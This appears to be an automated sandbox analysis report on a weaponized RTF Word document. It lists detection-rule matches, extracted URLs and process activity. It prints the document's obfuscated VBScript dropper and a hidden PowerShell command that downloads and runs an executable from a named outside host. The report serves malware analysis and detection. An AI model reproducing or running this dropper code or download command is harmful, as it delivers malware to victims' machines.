Source: file.exe, 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmp, file.exe, 00000009.00000000.921928467.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000010.00000000.947049391.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmp, file.exe, 00000015.00000000.1014911809.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000015.00000002.1283424107.000000000040A000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000006.00000002.919745005.000000001B39E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000006.00000002.919745005.000000001B388000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000006.00000002.919745005.000000001B388000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.00000000002DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000006.00000002.919745005.000000001B39E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000036DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000036DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000036DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000036DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000036DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000012.00000002.953185169.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/Yg
Source: powershell.exe, 0000000C.00000002.925602681.00000000001B7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.953185169.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000036DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000036DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000036DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
Source: powershell.exe, 00000006.00000002.919745005.000000001B388000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B39E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.00000000002DA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000035BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://thekaribacruisecompany.com
Source: powershell.exe, 00000006.00000002.912596165.00000000035BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B35A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://thekaribacruisecompany.com/file.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D69C60B5-B29E-4F37-A352-937B9DD503EB}.tmp
Source: unknown DNS traffic detected: queries for: thekaribacruisecompany.com
Source: unknown HTTPS traffic detected: 149.102.154.62:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\file.exe Code function: 9_2_004054B6 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard

System Summary

Source: TEPO0015922.doc, type: SAMPLE Matched rule: detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents. Author: ditekSHen
Source: TEPO0015922.doc, type: SAMPLE Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: Screenshot number: 8 Screenshot OCR: Enable Editing to view the document.
Source: Screenshot number: 16 Screenshot OCR: Enable Editing to view the document.
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file[1].exe
Source: ~WRF{B63E613D-9211-4CF9-925B-159614833873}.tmp.0.drStream path '_1740622809/\x1Ole10Native' : j....FZdtfhgYgeghD.scT.C:\osdsTggH\FZdtfhgYgeghD.scT..... ...C:\8jkepaD\FZdtfhgYgeghD.scT...<scriptleT.. ><script runat="server" language = 'vbscript'>....fsdfdsfs = "aHR0UHM6Ly90aGVrYXJpYmFjcnVpc2Vjb21wYW55LmNvbS9maWxlLmV4ZQ==" 'wiiurg..yulkytjtrhtjrkdsarjky ="ZmlsZS5leGU=" 'wiiurg..Function age64Funccode(ByVal cvwtr5ycbve, ByVal trtsk484t378).. Dim xtexenc.. if trtsk484t378 Then xtexenc = "utf-16le" Else xtexenc = "utf" + "-8".. ' Use an aux. XML document with a Base64-encoded element... ' Assigning the encoded text to .Text makes the decoded byte array.. jdcuidowfubg7 = "b" + "je".. vbsxjkhwgejkdwfgkvbf = "Cr".. vbsxjkhwgejkdwfgkvbf = vbsxjkhwgejkdwfgkvbf + "eateO".. vbsxjkhwgejkdwfgkvbf = vbsxjkhwgejkdwfgkvbf + jdcuidowfubg7 + "ct".. soswjwslvc = "reate".. mosdoepfy9eqje = "Se".. vposaleusaogr = "(""Msx".. vposaleusaogr = vposaleusaogr + "ml2.".. vposaleusaogr = vposaleusaogr + "DOMDocument"")" + ".C".. mosdoepfy9eqje = mosdoepfy9eqje + "t alxmd = " + vbsxjkhwgejkdwfgkvbf + vposaleusaogr + soswjwslvc + "E".. mosdoepfy9eqje = mosdoepfy9eqje + "l".. mosdoepfy9eqje = mosdoepfy9eqje + "em".. mosdoepfy9eqje = mosdoepfy9eqje + "ent(".. mosdoepfy9eqje = mosdoepfy9eqje + """a".. mosdoepfy9eqje = mosdoepfy9eqje + "ux"")".. 'MsgBox(mosdoepfy9eqje).. var1 = mosdoepfy9eqje...sn556 = "ex" + "ecu"...sn556 = sn556 + "te" + "(var1)".. dim uify7eiwhjdvhig3y893ry:EvaFunc sn556.. ksvjvwdwye2r = "Data".. odjeiojfyd2f8fu34u = "alxmd." + ksvjvwdwye2r + "Type = wslausfychks".. var1 = odjeiojfyd2f8fu34u.... sn556 = "ex" + "ecu" + "te" + "(var1)".. dim a32947234987234:EvaFunc(sn556)....'MsgBox(aaaaaaaadddd).. vartyzx = "md".. vartx = ".Tex"...rey45r3t3e3yhju = "alx" + vartyzx + vartx + "t = ".. rey45r3t3e3yhju = rey45r3t3e3yhju + "cvwtr5ycbve".. buicd78 = "alxmd.Text = cvwtr5ycbve".... var1 = buicd78.. sn556 = "ex" + "ecu" + "te" + "(var1)".. dim a32947234987236:execute sn556.... 
age64Funccode = BytesToStr(alxmd.NodeTypedValue, xtexenc)..End Function....apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 01007840626
Source: ~WRF{B63E613D-9211-4CF9-925B-159614833873}.tmp.0.drStream path '_1740622893/\x1Ole10Native' : k....FZdtfhgYgeghD.scT.C:\osdsTggH\FZdtfhgYgeghD.scT.....6...C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD.scT.j..<scriptleT.. ><script runat="server" language = 'vbscript'>....fsdfdsfs = "aHR0UHM6Ly90aGVrYXJpYmFjcnVpc2Vjb21wYW55LmNvbS9maWxlLmV4ZQ==" 'wiiurg..yulkytjtrhtjrkdsarjky ="ZmlsZS5leGU=" 'wiiurg..Function age64Funccode(ByVal cvwtr5ycbve, ByVal trtsk484t378).. Dim xtexenc.. if trtsk484t378 Then xtexenc = "utf-16le" Else xtexenc = "utf" + "-8".. ' Use an aux. XML document with a Base64-encoded element... ' Assigning the encoded text to .Text makes the decoded byte array.. jdcuidowfubg7 = "b" + "je".. vbsxjkhwgejkdwfgkvbf = "Cr".. vbsxjkhwgejkdwfgkvbf = vbsxjkhwgejkdwfgkvbf + "eateO".. vbsxjkhwgejkdwfgkvbf = vbsxjkhwgejkdwfgkvbf + jdcuidowfubg7 + "ct".. soswjwslvc = "reate".. mosdoepfy9eqje = "Se".. vposaleusaogr = "(""Msx".. vposaleusaogr = vposaleusaogr + "ml2.".. vposaleusaogr = vposaleusaogr + "DOMDocument"")" + ".C".. mosdoepfy9eqje = mosdoepfy9eqje + "t alxmd = " + vbsxjkhwgejkdwfgkvbf + vposaleusaogr + soswjwslvc + "E".. mosdoepfy9eqje = mosdoepfy9eqje + "l".. mosdoepfy9eqje = mosdoepfy9eqje + "em".. mosdoepfy9eqje = mosdoepfy9eqje + "ent(".. mosdoepfy9eqje = mosdoepfy9eqje + """a".. mosdoepfy9eqje = mosdoepfy9eqje + "ux"")".. 'MsgBox(mosdoepfy9eqje).. var1 = mosdoepfy9eqje...sn556 = "ex" + "ecu"...sn556 = sn556 + "te" + "(var1)".. dim uify7eiwhjdvhig3y893ry:EvaFunc sn556.. ksvjvwdwye2r = "Data".. odjeiojfyd2f8fu34u = "alxmd." + ksvjvwdwye2r + "Type = wslausfychks".. var1 = odjeiojfyd2f8fu34u.... sn556 = "ex" + "ecu" + "te" + "(var1)".. dim a32947234987234:EvaFunc(sn556)....'MsgBox(aaaaaaaadddd).. vartyzx = "md".. vartx = ".Tex"...rey45r3t3e3yhju = "alx" + vartyzx + vartx + "t = ".. rey45r3t3e3yhju = rey45r3t3e3yhju + "cvwtr5ycbve".. buicd78 = "alxmd.Text = cvwtr5ycbve".... var1 = buicd78.. sn556 = "ex" + "ecu" + "te" + "(var1)".. 
dim a32947234987236:execute sn556.... age64Funccode = BytesToStr(alxmd.NodeTypedValue, xtexenc)..End Function....apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "01007840626056208610365056308465023789460 + 0100784062605620861036505630846502378946086150570839465734*1283163712683761273681"..apkvaraks = "0100784062605620861036505630846
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\file.exe
Source: TEPO0015922.doc, type: SAMPLEMatched rule: SUSP_INDICATOR_RTF_MalVer_Objects date = 2022-10-20, hash2 = a31da6c6a8a340901f764586a28bd5f11f6d2a60a38bf60acd844c906a0d44b1, author = ditekSHen, description = Detects RTF documents with non-standard version and embedding one of the object mostly observed in exploit (e.g. CVE-2017-11882) documents., score = 43812ca7f583e40b3e3e92ae90a7e935c87108fa863702aa9623c6b7dc3697a2, reference = https://github.com/ditekshen/detection
Source: TEPO0015922.doc, type: SAMPLEMatched rule: INDICATOR_RTF_Exploit_Scripting author = ditekSHen, description = detects CVE-2017-8759 or CVE-2017-8570 weaponized RTF documents.
Source: TEPO0015922.doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: 0000000C.00000002.925602681.000000000016E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 0000000C.00000002.925602681.000000000016E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 00000006.00000002.912243758.0000000001CF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000006.00000002.911999906.0000000000200000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000006.00000002.911999906.0000000000200000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 00000012.00000002.953185169.0000000000280000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000012.00000002.953185169.0000000000280000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 00000012.00000002.955614868.0000000001BD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 0000000C.00000002.926137443.0000000001B46000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 0000000C.00000002.925602681.0000000000130000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 0000000C.00000002.925602681.0000000000130000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 00000006.00000002.911999906.000000000023E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000006.00000002.911999906.000000000023E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 00000012.00000002.953185169.00000000002BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000012.00000002.953185169.00000000002BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth (Nextron Systems), description = Detects PowerShell invocation with suspicious parameters, score = , reference = https://goo.gl/uAic1X, modified = 2022-09-15
Source: 0000000C.00000002.925602681.00000000001F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000012.00000002.953185169.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: Process Memory Space: powershell.exe PID: 1568, type: MEMORYSTRMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: Process Memory Space: powershell.exe PID: 1832, type: MEMORYSTRMatched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth (Nextron Systems), description = Detects suspicious PowerShell code that downloads from web sites, nodeepdive = , score = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-07-27
Source: C:\Users\user\AppData\Roaming\file.exe, type: DROPPEDMatched rule: SUSP_NullSoftInst_Combo_Oct20_1 date = 2020-10-06, hash3 = a9ca1d6a981ccc8d8b144f337c259891a67eb6b85ee41b03699baacf4aae9a78, hash2 = 93951379e57e4f159bb62fd7dd563d1ac2f3f23c80ba89f2da2e395b8a647dcf, author = Florian Roth (Nextron Systems), description = Detects suspicious NullSoft Installer combination with common Copyright strings, score = 686b5240e5e503528cc5ac8d764883413a260716dd290f114a60af873ee6a65f, reference = https://twitter.com/malwrhunterteam/status/1313023627177193472
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file[1].exe, type: DROPPEDMatched rule: SUSP_NullSoftInst_Combo_Oct20_1 date = 2020-10-06, hash3 = a9ca1d6a981ccc8d8b144f337c259891a67eb6b85ee41b03699baacf4aae9a78, hash2 = 93951379e57e4f159bb62fd7dd563d1ac2f3f23c80ba89f2da2e395b8a647dcf, author = Florian Roth (Nextron Systems), description = Detects suspicious NullSoft Installer combination with common Copyright strings, score = 686b5240e5e503528cc5ac8d764883413a260716dd290f114a60af873ee6a65f, reference = https://twitter.com/malwrhunterteam/status/1313023627177193472
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,9_2_004033B3
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,16_2_004033B3
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_0040727F9_2_0040727F
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_00406AA89_2_00406AA8
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_73C222889_2_73C22288
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_0040727F16_2_0040727F
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_00406AA816_2_00406AA8
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 16_2_73C3228816_2_73C32288
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 21_2_73BC228821_2_73BC2288
Source: C:\Users\user\AppData\Roaming\file.exeCode function: String function: 00402C39 appears 52 times
Source: ~WRF{B63E613D-9211-4CF9-925B-159614833873}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Users\user\AppData\Roaming\file.exeProcess Stats: CPU usage > 98%
Source: libgdk_pixbuf-2.0-0.dll.9.drStatic PE information: Number of sections : 12 > 10
Source: C:\Users\user\AppData\Roaming\file.exeMemory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\file.exeMemory allocated: 77740000 page execute and read and write
Source: TEPO0015922.docReversingLabs: Detection: 23%
Source: TEPO0015922.docVirustotal: Detection: 42%
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\file.exe C:\Users\user\AppData\Roaming\file.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\FZdtfhgYgeghD .scT
Source: C:\Users\user\AppData\Roaming\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: TEPO0015922.LNK.0.drLNK file: ..\..\..\..\..\Desktop\TEPO0015922.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$PO0015922.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR63F0.tmp
Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@29/33@2/1
Source: C:\Users\user\AppData\Roaming\file.exeCode function: 9_2_00402173 CoCreateInstance,MultiByteToWideChar,9_2_00402173
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.ini
